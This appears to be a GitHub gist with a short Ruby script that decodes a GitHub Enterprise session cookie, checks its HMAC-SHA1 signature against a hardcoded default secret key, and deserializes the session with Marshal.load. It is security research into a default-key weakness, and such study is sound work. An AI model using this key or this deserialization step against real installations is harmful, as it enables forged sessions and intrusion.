@allyshka
Last active March 9, 2019 16:06
GitHub Enterprise cookie decryption with default secret key
require "cgi"
require "openssl"

# Cookie layout: <URL-encoded Base64 of Marshal data>--<hex HMAC-SHA1>.
# The payload is only signed and encoded, not encrypted.
cookie = "BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiRWU4ZGJiNDcxM2M5Nzk1NTE1NzBm%0AYjNiOWQzNDczYjZiMzYzY2Q2ODE5ZjcxNjI0ZDk3YzY4YzQwMmM5ZTliZmYG%0AOwBGSSIPY3NyZi50b2tlbgY7AFRJIjFWVVArTFRXd0Npd0tTVDBaNlZzNDVC%0AekYzdndXd3lUa0UrMzBYcUNCM3RZPQY7AEY%3D%0A--229b711211f74793d491e5b57effeb81a042b5b9"
cookie = cookie.split("--")
data = CGI.unescape(cookie.first)   # Base64 text; this is what the HMAC covers
loaddata = data.unpack('m').first   # Base64-decoded Marshal bytes
hmac = cookie.last                  # hex HMAC-SHA1 sent with the cookie

# Default secret key
secret = "641dd6454584ddabfed6342cc66281fb"
expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
print "Hash comparing: ", expected_hmac, " == ", hmac, "\r\n"

# Deserialize the session only if the signature verifies under the default key
if expected_hmac == hmac
  session = Marshal.load(loaddata)
  print "SESSION_DATA: " + session.inspect, "\r\n"
end